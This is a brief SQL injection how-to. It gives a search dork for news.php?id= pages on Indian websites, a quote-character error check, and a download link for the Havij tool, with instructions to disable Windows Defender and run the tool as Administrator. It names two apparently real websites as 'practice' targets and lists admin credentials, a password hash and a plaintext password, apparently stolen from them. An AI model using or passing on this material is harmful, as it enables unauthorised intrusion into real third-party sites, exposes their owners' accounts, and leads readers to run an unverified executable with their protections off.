Dork: 

news.php?id= site:.in
gallery, event, media, image, video

SQL Error Check : %27, '

Software : Havij

Havij link: https://mega.nz/#!pKhEgISL!bqc38_osh3Km7moWC6AAJhwAZxIiCoP8pMM7En8Di_0

N.B: 1) Turn off "Real-time Protection" from Windows Defender
        2) Open Havij.exe as Administrator

Practice: 

1) site with id link: http://heritageaviation.in/news.php?id=1
username: admin
password: $H$BZxvsBgwHo/Vzf/KbOvZrfEUxcnuCz0

2. site with id link: http://math4all.in/news.php?id=6
username: Admin
password: ikrana@123
